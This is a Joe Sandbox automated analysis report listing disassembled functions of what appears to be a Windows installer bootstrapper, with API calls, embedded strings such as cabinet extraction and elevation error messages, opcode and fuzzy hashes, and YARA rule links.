                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastWrite_memcpy_s
                                                                                                                                                                    • String ID: Failed to write during cabinet extraction.$Unexpected call to CabWrite().$cabextract.cpp
                                                                                                                                                                    • API String ID: 1970631241-3111339858
                                                                                                                                                                    • Opcode ID: d32e29334773f32556d81820a0ca3635e0a398bce4b84085ba4106eeda663bd7
                                                                                                                                                                    • Instruction ID: a7088f6382bd4ad89c534eeafead2402007297c48825a1782049b2b9a9b5b3d6
                                                                                                                                                                    • Opcode Fuzzy Hash: d32e29334773f32556d81820a0ca3635e0a398bce4b84085ba4106eeda663bd7
                                                                                                                                                                    • Instruction Fuzzy Hash: 79210EBA504214ABCB10CF6DE885E6A3BBCFFC8324B214259FE04D724AE671D900CB60
                                                                                                                                                                    Function 00909AE0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 72COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • _MREFOpen@16.MSPDB140-MSVCRT ref: 00909AFB
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000,000002C0,?,00000000,00000000,000002C0,00000100,00000000,00000000,?,0090A8B4,00000100,000002C0,000002C0,00000100), ref: 00909B10
                                                                                                                                                                    • GetLastError.KERNEL32(?,0090A8B4,00000100,000002C0,000002C0,00000100), ref: 00909B1B
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to format variable string., xrefs: 00909B06
                                                                                                                                                                    • Failed while searching directory search: %ls, for path: %ls, xrefs: 00909B54
                                                                                                                                                                    • Failed to set variable., xrefs: 00909B7A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AttributesErrorFileLastOpen@16
                                                                                                                                                                    • String ID: Failed to format variable string.$Failed to set variable.$Failed while searching directory search: %ls, for path: %ls
                                                                                                                                                                    • API String ID: 1811509786-402580132
                                                                                                                                                                    • Opcode ID: 77bdbaca2a58f08213ec5a23e0bbc055a1207bb0d95d62642eb9f2ea06ce10c3
                                                                                                                                                                    • Instruction ID: 61d02134e1899c91f13a557e09a99ea55745e9900eafcc85dc5bbd6ebd1c3093
                                                                                                                                                                    • Opcode Fuzzy Hash: 77bdbaca2a58f08213ec5a23e0bbc055a1207bb0d95d62642eb9f2ea06ce10c3
                                                                                                                                                                    • Instruction Fuzzy Hash: 0311E633940539BFDB225AA8AC42F6EF618EF41374F210321FE20A61E2C775AD50A6D4
                                                                                                                                                                    Function 00920C57 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00920CC4
                                                                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00920CD6
                                                                                                                                                                    • SetFileTime.KERNEL32(?,?,?,?), ref: 00920CE9
                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF,?,?,?,?,?,?,?,?,?,?,?,?,009208B1,?,?), ref: 00920CF8
                                                                                                                                                                    Strings
                                                                                                                                                                    • Invalid operation for this state., xrefs: 00920C9D
                                                                                                                                                                    • cabextract.cpp, xrefs: 00920C93
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Time$File$CloseDateHandleLocal
                                                                                                                                                                    • String ID: Invalid operation for this state.$cabextract.cpp
                                                                                                                                                                    • API String ID: 609741386-1751360545
                                                                                                                                                                    • Opcode ID: df03007b6f04fceaa9ed8e2285821d3ad92d2336820b214bb8e34b43b15cf37b
                                                                                                                                                                    • Instruction ID: 8fdb63fddc01cad35030b685468bc3c035884438a330fb8ae4faf6665e494362
                                                                                                                                                                    • Opcode Fuzzy Hash: df03007b6f04fceaa9ed8e2285821d3ad92d2336820b214bb8e34b43b15cf37b
                                                                                                                                                                    • Instruction Fuzzy Hash: C5210572811229AB8710DFA8EC09DFA7BBCFF843207108316F864D65D1D374E911CB90
                                                                                                                                                                    Function 00914A77 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 68fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,crypt32.dll,00000000,00000000,00000000,?,0091539D), ref: 00914AC3
                                                                                                                                                                    Strings
                                                                                                                                                                    • crypt32.dll, xrefs: 00914A7D
                                                                                                                                                                    • Failed to allocate message to write., xrefs: 00914AA2
                                                                                                                                                                    • Failed to write message type to pipe., xrefs: 00914B05
                                                                                                                                                                    • pipe.cpp, xrefs: 00914AFB
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FileWrite
                                                                                                                                                                    • String ID: Failed to allocate message to write.$Failed to write message type to pipe.$crypt32.dll$pipe.cpp
                                                                                                                                                                    • API String ID: 3934441357-606776022
                                                                                                                                                                    • Opcode ID: 24718a0912b0c9615e8b30864d45b4a2e19f925c26b8052f030791dfbf1378eb
                                                                                                                                                                    • Instruction ID: a2a21cedac8cb3d235b010f6b9fb363ced76cc0290f749f36be9065e0b319da1
                                                                                                                                                                    • Opcode Fuzzy Hash: 24718a0912b0c9615e8b30864d45b4a2e19f925c26b8052f030791dfbf1378eb
                                                                                                                                                                    • Instruction Fuzzy Hash: 57118C72A8412DBADB21CF95DD05EDE7AA8EF88751F114165FD00B6240D7709E90E7A0
                                                                                                                                                                    Function 00914642 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 64COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • _memcpy_s.LIBCMT ref: 00914693
                                                                                                                                                                    • _memcpy_s.LIBCMT ref: 009146A6
                                                                                                                                                                    • _memcpy_s.LIBCMT ref: 009146C1
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: _memcpy_s$Heap$AllocateProcess
                                                                                                                                                                    • String ID: Failed to allocate memory for message.$feclient.dll$pipe.cpp
                                                                                                                                                                    • API String ID: 886498622-766083570
                                                                                                                                                                    • Opcode ID: 13a67ee324e967fc95c9a4095f86e17763822eb0bd00abca82800306c7a17004
                                                                                                                                                                    • Instruction ID: 4eb2e73f7920ae51779ada8b90308e180c9fb534a94592d25ba4fdd81a974e70
                                                                                                                                                                    • Opcode Fuzzy Hash: 13a67ee324e967fc95c9a4095f86e17763822eb0bd00abca82800306c7a17004
                                                                                                                                                                    • Instruction Fuzzy Hash: 57119EB220030EAFDB01EE94CC82DEB77ACEF89B18B008526FA10DB181D771D65487E0
                                                                                                                                                                    Function 00943C72 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 61COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ShellExecuteExW.SHELL32(?), ref: 00943CC0
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,00000000), ref: 00943CCA
                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000000), ref: 00943CFD
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseErrorExecuteHandleLastShell
                                                                                                                                                                    • String ID: <$PDu$shelutil.cpp
                                                                                                                                                                    • API String ID: 3023784893-2418939910
                                                                                                                                                                    • Opcode ID: 8afba5f5208915374089b7e7e40d53f6ba5878c98cf17eb6d859f5f08d0559f4
                                                                                                                                                                    • Instruction ID: 8fd45cc42425f65bda70c7423f4d68a0e3328326cdbe64090134d7c961241fec
                                                                                                                                                                    • Opcode Fuzzy Hash: 8afba5f5208915374089b7e7e40d53f6ba5878c98cf17eb6d859f5f08d0559f4
                                                                                                                                                                    • Instruction Fuzzy Hash: A311D875E01229ABCB10DFA9D945A8EBBF8AB08755F108125FD15F7340E7309A00DBA4
                                                                                                                                                                    Function 00909A4D Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 57COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00909AC4
                                                                                                                                                                    Strings
                                                                                                                                                                    • Condition, xrefs: 00909A5F
                                                                                                                                                                    • `<u, xrefs: 00909AC4
                                                                                                                                                                    • Failed to select condition node., xrefs: 00909A7B
                                                                                                                                                                    • Failed to copy condition string from BSTR, xrefs: 00909AAE
                                                                                                                                                                    • Failed to get Condition inner text., xrefs: 00909A94
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeString
                                                                                                                                                                    • String ID: Condition$Failed to copy condition string from BSTR$Failed to get Condition inner text.$Failed to select condition node.$`<u
                                                                                                                                                                    • API String ID: 3341692771-266405526
                                                                                                                                                                    • Opcode ID: d8fd8ab934699ae11276be493843e2b20328666d29603b5d7e3eed18f983a1fa
                                                                                                                                                                    • Instruction ID: 80d3da845bc001900fbbf2da35b38d6e6dfbf9679ec49d52679483fbb23c03dd
                                                                                                                                                                    • Opcode Fuzzy Hash: d8fd8ab934699ae11276be493843e2b20328666d29603b5d7e3eed18f983a1fa
                                                                                                                                                                    • Instruction Fuzzy Hash: FF11A136B06228BFCB16AB94CD06FADBB69AF40725F104254FC01BA192C7B19E40D790
                                                                                                                                                                    Function 009496CD Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
                                                                                                                                                                    • API String ID: 0-1718035505
                                                                                                                                                                    • Opcode ID: 84978c64edf45b09c8897140565a76bc4d93b20c307d5a24e6c775cc4583fc3e
                                                                                                                                                                    • Instruction ID: 9b5785585ec3c980a61ea67e5fd4260252f1d5d2be7dd7da7c144290575dfd15
                                                                                                                                                                    • Opcode Fuzzy Hash: 84978c64edf45b09c8897140565a76bc4d93b20c307d5a24e6c775cc4583fc3e
                                                                                                                                                                    • Instruction Fuzzy Hash: EA01C2757BA3225F4F300EAA9CD4EE7238C9B433A631105BAE666D3150EB91C885F790
                                                                                                                                                                    Function 00940ACC Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 41libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,?,00905EB2,00000000), ref: 00940AE0
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000), ref: 00940AE7
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00905EB2,00000000), ref: 00940AFE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressErrorHandleLastModuleProc
                                                                                                                                                                    • String ID: IsWow64Process$kernel32$procutil.cpp
                                                                                                                                                                    • API String ID: 4275029093-1586155540
                                                                                                                                                                    • Opcode ID: f2e9c09289e76bd54a08c8a51b41e897f991e25b015667b0d46cabf33979a8b5
                                                                                                                                                                    • Instruction ID: ff2d6b4507785757f1860b6fbdb35210f3fa09193a601a5652b1a1bea4de8b48
                                                                                                                                                                    • Opcode Fuzzy Hash: f2e9c09289e76bd54a08c8a51b41e897f991e25b015667b0d46cabf33979a8b5
                                                                                                                                                                    • Instruction Fuzzy Hash: 2AF0C876E14239A78B209B959C09D5BBB68EF41795B014155BE05AB280EB70DD00D7D4
                                                                                                                                                                    Function 0093A20B Relevance: 9.2, APIs: 6, Instructions: 216COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00933479,00933479,?,?,?,0093A45C,00000001,00000001,ECE85006), ref: 0093A265
                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,0093A45C,00000001,00000001,ECE85006,?,?,?), ref: 0093A2EB
                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,ECE85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0093A3E5
                                                                                                                                                                    • __freea.LIBCMT ref: 0093A3F2
                                                                                                                                                                      • Part of subcall function 0093521A: HeapAlloc.KERNEL32(00000000,?,?,?,00931F87,?,0000015D,?,?,?,?,009333E0,000000FF,00000000,?,?), ref: 0093524C
                                                                                                                                                                    • __freea.LIBCMT ref: 0093A3FB
                                                                                                                                                                    • __freea.LIBCMT ref: 0093A420
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ByteCharMultiWide__freea$AllocHeap
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3147120248-0
                                                                                                                                                                    • Opcode ID: 406295ab0b3ffa62c4df6b969540dd47dcaf4be1fa0b42db65c84f580c6bf1d9
                                                                                                                                                                    • Instruction ID: a41d92d7d2e19574a028f607d93147713b6cd0491610e8602e0d1f089e610421
                                                                                                                                                                    • Opcode Fuzzy Hash: 406295ab0b3ffa62c4df6b969540dd47dcaf4be1fa0b42db65c84f580c6bf1d9
                                                                                                                                                                    • Instruction Fuzzy Hash: 5E51FF72610216AFEB258F64CC85FBF77A9EB84750F254628FC54D6180EB74DC80DA52
                                                                                                                                                                    Function 00918CAC Relevance: 9.1, APIs: 1, Strings: 5, Instructions: 122sleepCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • Sleep.KERNEL32(000007D0,00000000,00000000), ref: 00918D18
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Sleep
                                                                                                                                                                    • String ID: Failed to calculate cache path.$Failed to get %hs package cache root directory.$Failed to get old %hs package cache root directory.$per-machine$per-user
                                                                                                                                                                    • API String ID: 3472027048-398165853
                                                                                                                                                                    • Opcode ID: 9f3ea515cf8d537eedbd3592f96e76405a66e1bbce171e759055bacdb8bceef5
                                                                                                                                                                    • Instruction ID: 07ddf88fceead0edb58a6cfec9a8003d04a2c9d5521e8041bb4c25977631a7ae
                                                                                                                                                                    • Opcode Fuzzy Hash: 9f3ea515cf8d537eedbd3592f96e76405a66e1bbce171e759055bacdb8bceef5
                                                                                                                                                                    • Instruction Fuzzy Hash: BE31E476B4072CBBEB22AA649C46FFF626C9F60711F114025FD00F62D1DA758D80A7A1
                                                                                                                                                                    Function 0091E956 Relevance: 9.1, APIs: 6, Instructions: 85windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • DefWindowProcW.USER32(?,00000082,?,?), ref: 0091E985
                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0091E994
                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 0091E9A8
                                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 0091E9B8
                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0091E9D2
                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 0091EA31
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$Long$Proc$MessagePostQuit
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3812958022-0
                                                                                                                                                                    • Opcode ID: 1011eefd05995f2a1ac76351e8a9ad5ce55f0b87c8dc0f4746c26c033a098a8d
                                                                                                                                                                    • Instruction ID: c09a336e4a30dbbcc6bde126739f3db06b6102a8e4538203d487b43368e98c19
                                                                                                                                                                    • Opcode Fuzzy Hash: 1011eefd05995f2a1ac76351e8a9ad5ce55f0b87c8dc0f4746c26c033a098a8d
                                                                                                                                                                    • Instruction Fuzzy Hash: F921C579208108FFDF119F68DC49EAA3B69FF85310F548618FD0A9A1A4C731DD90EB50
                                                                                                                                                                    Function 0091C7C9 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 164synchronizationCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to save state., xrefs: 0091C891
                                                                                                                                                                    • elevation.cpp, xrefs: 0091C9B8
                                                                                                                                                                    • Unexpected elevated message sent to child process, msg: %u, xrefs: 0091C9C4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CloseHandleMutexRelease
                                                                                                                                                                    • String ID: Failed to save state.$Unexpected elevated message sent to child process, msg: %u$elevation.cpp
                                                                                                                                                                    • API String ID: 4207627910-1576875097
                                                                                                                                                                    • Opcode ID: 8609cb963a0080708370327c022770927087e0bf065289183cb8e6d900413132
                                                                                                                                                                    • Instruction ID: c194372198fcfb6bef529d963b7af0899edc9826ab9f5f5b49eeb5a774c3c19b
                                                                                                                                                                    • Opcode Fuzzy Hash: 8609cb963a0080708370327c022770927087e0bf065289183cb8e6d900413132
                                                                                                                                                                    • Instruction Fuzzy Hash: ED61E87A240508FFCB129F84CD01DA5BBB2FF48314715C899FAA95A632C732E861EF41
                                                                                                                                                                    Function 00947B16 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 162COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 0090394F: GetProcessHeap.KERNEL32(?,000001C7,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903960
                                                                                                                                                                      • Part of subcall function 0090394F: RtlAllocateHeap.NTDLL(00000000,?,00902274,000001C7,00000001,80004005,8007139F,?,?,00940267,8007139F,?,00000000,00000000,8007139F), ref: 00903967
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00947C74
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00947C7F
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00947C8A
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeString$Heap$AllocateProcess
